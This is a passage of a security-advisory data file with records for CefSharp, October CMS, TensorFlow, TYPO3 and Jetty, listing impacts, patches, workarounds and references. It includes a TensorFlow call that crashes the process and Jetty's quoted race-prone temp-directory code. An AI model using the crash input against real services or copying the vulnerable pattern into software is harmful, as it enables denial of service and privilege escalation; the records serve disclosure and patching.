+- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017
+
+Google is aware of reports that exploits for CVE-2020-16013 and CVE-2020-16017 exist in the wild.
+
+There is currently little to no public information on the issue other than it has been flagged as `High` severity.",[],"[{'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Wpf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.WinForms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Wpf.HwndHost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cefsharp/CefSharp/security/advisories/GHSA-gvqv-779r-4jgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16017'}, {'type': 'WEB', 'url': 'https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html'}, {'type': 'WEB', 'url': 'https://crbug.com/1146709'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-27T20:06:27Z', 'nvd_published_at': '2021-01-08T19:15:00Z'}"
+1.4.0,GHSA-xwjr-6fj7-fc6h,2021-11-19T13:46:03Z,2020-11-23T19:48:12Z,,['CVE-2020-15246'],Local File Inclusion by unauthenticated users,"### Impact
+An attacker can exploit this vulnerability to read local files on an October CMS server. The vulnerability is exploitable by unauthenticated users via a specially crafted request.
+
+### Patches
+Issue has been patched in Build 469 (v1.0.469) and v1.1.0.
+
+### Workarounds
+Apply https://github.com/octobercms/library/commit/80aab47f044a2660aa352450f55137598f362aa4 to your installation manually if unable to upgrade to Build 469.
+
+### References
+Reported by [ka1n4t](https://github.com/ka1n4t)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat assessment:
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.421'}, {'fixed': '1.0.469'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-xwjr-6fj7-fc6h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15246'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/80aab47f044a2660aa352450f55137598f362aa4'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-22', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T19:23:14Z', 'nvd_published_at': '2020-11-23T20:15:00Z'}"
+1.4.0,GHSA-rrfp-j2mp-hq9c,2021-08-26T15:20:27Z,2020-11-13T17:13:04Z,,['CVE-2020-15265'],Segfault in `tf.quantization.quantize_and_dequantize`,"### Impact
+An attacker can pass an invalid `axis` value to `tf.quantization.quantize_and_dequantize`:
+
+```python
+tf.quantization.quantize_and_dequantize(
+ input=[2.5, 2.5], input_min=[0,0], input_max=[1,1], axis=10)
+```
+
+This results in accessing [a dimension outside the rank of the input tensor](https://github.com/tensorflow/tensorflow/blob/0225022b725993bfc19b87a02a2faaad9a53bc17/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L74) in the C++ kernel implementation:
+```
+const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);
+```
+
+However, [`dim_size` only does a `DCHECK`](https://github.com/tensorflow/tensorflow/blob/0225022b725993bfc19b87a02a2faaad9a53bc17/tensorflow/core/framework/tensor_shape.cc#L292-L307) to validate the argument and then uses it to access the corresponding element of an array:
+```
+int64 TensorShapeBase::dim_size(int d) const {
+ DCHECK_GE(d, 0);
+ DCHECK_LT(d, dims());
+ DoStuffWith(dims_[d]);
+}
+```
+
+Since in normal builds, `DCHECK`-like macros are no-ops, this results in segfault and access out of bounds of the array.
+
+### Patches
+
+We have patched the issue in eccb7ec454e6617738554a255d77f08e60ee0808 and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported in #42105","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rrfp-j2mp-hq9c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15265'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/42105'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/eccb7ec454e6617738554a255d77f08e60ee0808'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T17:11:27Z', 'nvd_published_at': '2020-10-21T21:15:00Z'}"
+1.4.0,GHSA-954j-f27r-cj52,2021-01-07T22:40:37Z,2020-11-23T21:18:36Z,,['CVE-2020-26228'],Cleartext storage of session identifier,"User session identifiers were stored in cleartext - without processing of additional cryptographic hashing algorithms. This vulnerability cannot be exploited directly and occurs in combination with a chained attack - like for instance SQL injection in any other component of the system.
+
+### Solution
+Update to TYPO3 versions 9.5.23 or 10.4.10 that fix the problem described.
+
+### Credits
+Thanks to TYPO3 security team member Helmut Hummel who reported this issue and to TYPO3 core & security team members Benni Mack & Oliver Hader as well as TYPO3 contributor Markus Klein who fixed the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-954j-f27r-cj52'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26228'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-011'}]","{'cwe_ids': ['CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T21:10:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x7fx-mcc9-27j7,2020-11-27T20:12:35Z,2020-11-27T20:12:55Z,,['CVE-2020-16013'],Inappropriate implementation in V8 in CefSharp,"High CVE-2020-16013: Inappropriate implementation in V8.
+
+- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013
+
+Google is aware of reports that exploits for CVE-2020-16013 and CVE-2020-16017 exist in the wild.
+
+There is currently little to no public information on the issue other than it has been flagged as `High` severity.",[],"[{'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Wpf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.WinForms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'CefSharp.Wpf.HwndHost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '86.0.241'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cefsharp/CefSharp/security/advisories/GHSA-x7fx-mcc9-27j7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16013'}, {'type': 'WEB', 'url': 'https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html'}, {'type': 'WEB', 'url': 'https://crbug.com/1147206'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-27T20:12:35Z', 'nvd_published_at': '2021-01-08T19:15:00Z'}"
+1.4.0,GHSA-rfjc-xrmf-5vvw,2021-11-19T13:40:25Z,2020-11-23T19:47:27Z,,['CVE-2020-15248'],"Privilege escalation by backend users assigned to the default ""Publisher"" system role","### Impact
+Backend users with the default ""Publisher"" system role have access to create & manage users where they can choose which role the new user has. This means that a user with ""Publisher"" access has the ability to escalate their access to ""Developer"" access.
+
+### Patches
+Issue has been patched in Build 470 (v1.0.470) & v1.1.1.
+
+### Workarounds
+Apply https://github.com/octobercms/october/commit/78a37298a4ed4602b383522344a31e311402d829 to your installation manually if unable to upgrade to Build 470 or v1.1.1.
+
+### References
+Reported by [Hoan Hoang](https://github.com/hoanhp)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat assessment:
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.319'}, {'fixed': '1.0.470'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-rfjc-xrmf-5vvw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15248'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/4c650bb775ab849e48202a4923bac93bd74f9982'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/78a37298a4ed4602b383522344a31e311402d829'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T19:40:34Z', 'nvd_published_at': '2020-11-23T20:15:00Z'}"
+1.4.0,GHSA-g3wg-6mcf-8jj6,2022-02-08T22:03:47Z,2020-11-04T17:50:24Z,,['CVE-2020-27216'],Local Temp Directory Hijacking Vulnerability,"### Impact
+On Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.
+
+Additionally, any user code uses of [WebAppContext::getTempDirectory](https://www.eclipse.org/jetty/javadoc/9.4.31.v20200723/org/eclipse/jetty/webapp/WebAppContext.html#getTempDirectory()) would similarly be vulnerable.
+
+Additionally, any user application code using the `ServletContext` attribute for the tempdir will also be impacted.
+See: https://javaee.github.io/javaee-spec/javadocs/javax/servlet/ServletContext.html#TEMPDIR
+
+For example:
+```java
+import java.io.File;
+import java.io.IOException;
+import javax.servlet.ServletContext;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+public class ExampleServlet extends HttpServlet {
+ @Override
+ protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
+ File tempDir = (File)getServletContext().getAttribute(ServletContext.TEMPDIR); // Potentially compromised
+ // do something with that temp dir
+ }
+}
+```
+
+Example: The JSP library itself will use the container temp directory for compiling the JSP source into Java classes before executing them.
+
+### CVSSv3.1 Evaluation
+
+This vulnerability has been calculated to have a [CVSSv3.1 score of 7.8/10 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)
+
+### Patches
+Fixes were applied to the 9.4.x branch with:
+- https://github.com/eclipse/jetty.project/commit/53e0e0e9b25a6309bf24ee3b10984f4145701edb
+- https://github.com/eclipse/jetty.project/commit/9ad6beb80543b392c91653f6bfce233fc75b9d5f
+
+These will be included in releases: 9.4.33, 10.0.0.beta3, 11.0.0.beta3
+
+### Workarounds
+
+A work around is to set a temporary directory, either for the server or the context, to a directory outside of the shared temporary file system.
+For recent releases, a temporary directory can be created simple by creating a directory called `work` in the ${jetty.base} directory (the parent directory of the `webapps` directory).
+Alternately the java temporary directory can be set with the System Property `java.io.tmpdir`. A more detailed description of how jetty selects a temporary directory is below.
+
+The Jetty search order for finding a temporary directory is as follows:
+
+1. If the [`WebAppContext` has a temp directory specified](https://www.eclipse.org/jetty/javadoc/current/org/eclipse/jetty/webapp/WebAppContext.html#setTempDirectory(java.io.File)), use it.
+2. If the `ServletContext` has the `javax.servlet.context.tempdir` attribute set, and if directory exists, use it.
+3. If a `${jetty.base}/work` directory exists, use it (since Jetty 9.1)
+4. If a `ServletContext` has the `org.eclipse.jetty.webapp.basetempdir` attribute set, and if the directory exists, use it.
+5. Use `System.getProperty(""java.io.tmpdir"")` and use it.
+
+Jetty will end traversal at the first successful step.
+To mitigate this vulnerability the directory must be set to one that is not writable by an attacker. To avoid information leakage, the directory should also not be readable by an attacker.
+
+#### Setting a Jetty server temporary directory.
+
+Choices 3 and 5 apply to the server level, and will impact all deployed webapps on the server.
+
+For choice 3 just create that work directory underneath your `${jetty.base}` and restart Jetty.
+
+For choice 5, just specify your own `java.io.tmpdir` when you start the JVM for Jetty.
+
+``` shell
+[jetty-distribution]$ java -Djava.io.tmpdir=/var/web/work -jar start.jar
+```
+
+#### Setting a Context specific temporary directory.
+
+The rest of the choices require you to configure the context for that deployed webapp (seen as `${jetty.base}/webapps/.xml`)
+
+Example (excluding the DTD which is version specific):
+
+``` xml
+
+
+ /var/web/webapps/foo.war
+ /var/web/work/foo
+
+```
+
+### References
+
+ - https://github.com/eclipse/jetty.project/issues/5451
+ - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)
+ - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)
+ - [CodeQL Query PR To Detect Similar Vulnerabilities](https://github.com/github/codeql/pull/4473)
+
+### Similar Vulnerabilities
+
+Similar, but not the same.
+
+ - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp
+ - Google Guava - https://github.com/google/guava/issues/4011
+ - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945
+ - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824
+
+### For more information
+
+The original report of this vulnerability is below:
+
+> On Thu, 15 Oct 2020 at 21:14, Jonathan Leitschuh wrote:
+> Hi WebTide Security Team,
+>
+> I'm a security researcher writing some custom CodeQL queries to find Local Temporary Directory Hijacking Vulnerabilities. One of my queries flagged an issue in Jetty.
+>
+> https://lgtm.com/query/5615014766184643449/
+>
+> I've recently been looking into security vulnerabilities involving the temporary directory because on unix-like systems, the system temporary directory is shared between all users.
+> There exists a race condition between the deletion of the temporary file and the creation of the directory.
+>
+> ```java
+> // ensure file will always be unique by appending random digits
+> tmpDir = File.createTempFile(temp, "".dir"", parent); // Attacker knows the full path of the file that will be generated
+> // delete the file that was created
+> tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty.
+> // and make a directory of the same name
+> // SECURITY VULNERABILITY: Race Condition! - Attacker beats Jetty and now owns this directory
+> tmpDir.mkdirs();
+> ```
+>
+> https://github.com/eclipse/jetty.project/blob/1b59672b7f668b8a421690154b98b4b2b03f254b/jetty-webapp/src/main/java/org/eclipse/jetty/webapp/WebInfConfiguration.java#L511-L518
+>
+> In several cases the `parent` parameter will not be the system temporary directory. However, there is one case where it will be, as the last fallback.
+>
+>
+> https://github.com/eclipse/jetty.project/blob/1b59672b7f668b8a421690154b98b4b2b03f254b/jetty-webapp/src/main/java/org/eclipse/jetty/webapp/WebInfConfiguration.java#L467-L468
+>
+> If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.
+>
+> Would your team be willing to open a GitHub security advisory to continue the discussion and disclosure there? https://github.com/eclipse/jetty.project/security/advisories
+>
+> **This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). Full disclosure will occur either at the end of the 90-day deadline or whenever a patch is made widely available, whichever occurs first.**
+>
+> Cheers,
+> Jonathan Leitschuh
+
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.4.33'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.mortbay.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.4.33'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0.beta1'}, {'fixed': '10.0.0.beta3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.0.beta2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.mortbay.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0.beta1'}, {'fixed': '10.0.0.beta3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.0.beta2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0.beta1'}, {'fixed': '11.0.0.beta3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.0.beta2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.mortbay.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0.beta1'}, {'fixed': '11.0.0.beta3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.0.beta2'}}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6'}, {'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6#advisory-comment-63053'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27216'}, {'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/issues/5451'}, {'type': 'WEB', 'url': 'https://github.com/github/codeql/pull/4473'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=567921'}, {'type': 'WEB', 'url': 'https://cwe.mitre.org/data/definitions/378.html'}, {'type': 'WEB', 'url': 'https://cwe.mitre.org/data/definitions/379.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0259b14ae69b87821e27fed1f5333ea86018294fd31aab16b1fac84e@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r07525dc424ed69b3919618599e762f9ac03791490ca9d724f2241442@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r09b345099b4f88d2bed7f195a96145849243fb4e53661aa3bcf4c176@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d7ad4f02c44d5d53a9ffcbca7ff4a8138241322da9c5c35b5429630@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d95e01f52667f44835c40f6dea72bb4397f33cd70a564ea74f3836d@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0df8fe10fc36028cf6d0381ab66510917d0d68bc5ef7042001d03830@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0e9efe032cc65433251ee6470c66c334d4e7db9101e24cf91a3961f2@%3Ccommits.directory.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0f5e9b93133ef3aaf31484bc3e15cc4b85f8af0fe4de2dacd9379d72@%3Cdev.felix.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r100c5c7586a23a19fdb54d8a32e17cd0944bdaa46277b35c397056f6@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r171846414347ec5fed38241a9f8a009bd2c89d902154c6102b1fb39a@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r185d10aae8161c08726f3ba9a1f1c47dfb97624ea6212fa217173204@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r18b6f10d9939419bae9c225d5058c97533cb376c9d6d0a0733ddd48d@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r19e8b338af511641d211ff45c43646fe1ae19dc9897d69939c09cabe@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1d40368a309f9d835dcdd900249966e4fcbdf98c1cc4c84db2cd9964@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1d45051310b11c6d6476f20d71b08ea97cb76846cbf61d196bac1c3f@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1dbb87c9255ecefadd8de514fa1d35c1d493c0527d7672cf40505d04@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1ed79516bd6d248ea9f0e704dbfd7de740d5a75b71c7be8699fec824@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1ef28b89ff0281c87ba3a7659058789bf28a99b8074191f1c3678db8@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fe31643fc34b4a33ae3d416d92c271aa97663f1782767d25e1d9ff8@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2122537d3f9beb0ce59f44371a951b226406719919656ed000984bd0@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r279254a1bd6434c943da52000476f307e62b6910755387aeca1ec9a1@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2aa316d008dab9ae48350b330d15dc1b863ea2a933558fbfc42b91a6@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d17b2a4803096ba427f3575599ea29b55f5cf9dbc1f12ba044cae1a@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2e02700f7cfecb213de50be83e066086bea90278cd753db7fdc2ccff@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f732ee49d00610683ab5ddb4692ab25136b00bfd132ca3a590218a9@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3042a9dd2973aa229e52d022df7813e4d74b67df73bfa6d97bb0caf8@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r336b1694a01858111e4625fb9ab2b07ad43a64a525cf6402e06aa6bf@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r351298dd39fc1ab63303be94b0c0d08acd72b17448e0346d7386189b@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r382870d6ccfd60533eb0d980688261723ed8a0704dafa691c4e9aa68@%3Ccommits.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3a763de620be72b6d74f46ec4bf39c9f35f8a0b39993212c0ac778ec@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3b0ce1549a1ccdd7e51ec66daf8d54d46f1571edbda88ed09c96d7da@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3e05ab0922876e74fea975d70af82b98580f4c14ba643c4f8a9e3a94@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f32cb4965239399c22497a0aabb015b28b2372d4897185a6ef0ccd7@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r407c316f6113dfc76f7bb3cb1693f08274c521064a92e5214197548e@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4179c71908778cc0598ee8ee1eaed9b88fc5483c65373f45e087f650@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r44115ebfbf3b7d294d7a75f2d30bcc822dab186ebbcc2dce11915ca9@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4946ffd86ad6eb7cb7863311235c914cb41232380de8d9dcdb3c115c@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4f29fb24639ebc5d15fc477656ebc2b3aa00fcfbe197000009c26b40@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r503045a75f4419d083cb63ac89e765d6fb8b10c7dacc0c54fce07cff@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r547bb14c88c5da2588d853ed3030be0109efa537dd797877dff14afd@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5494fdaf4a0a42a15c49841ba7ae577d466d09239ee1050458da0f29@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r556787f1ab14da034d79dfff0c123c05877bbe89ef163fd359b4564c@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r568d354961fa88f206dc345411fb11d245c6dc1a8da3e80187fc6706@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r58f5b14dc5ae43583db3a7e872419aca97ebe47bcd7f7334f4128016@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r59e0878013d329dcc481eeafebdb0ee445b1e2852d0c4827b1ddaff2@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5a07f274f355c914054c7357ad6d3456ffaca064f26cd780acb90a9a@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5a9462096c71593e771602beb0e69357adb5175d9a5c18d5181e0ab4@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6236ae4adc401e3b2f2575c22865f2f6c6ea9ff1d7b264b40d9602af@%3Cissues.beam.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r66e99d973fd79ddbcb3fbdb24f4767fe9b911f5b0abb05d7b6f65801@%3Ccommits.zookeeper.apache.org%3E'}, 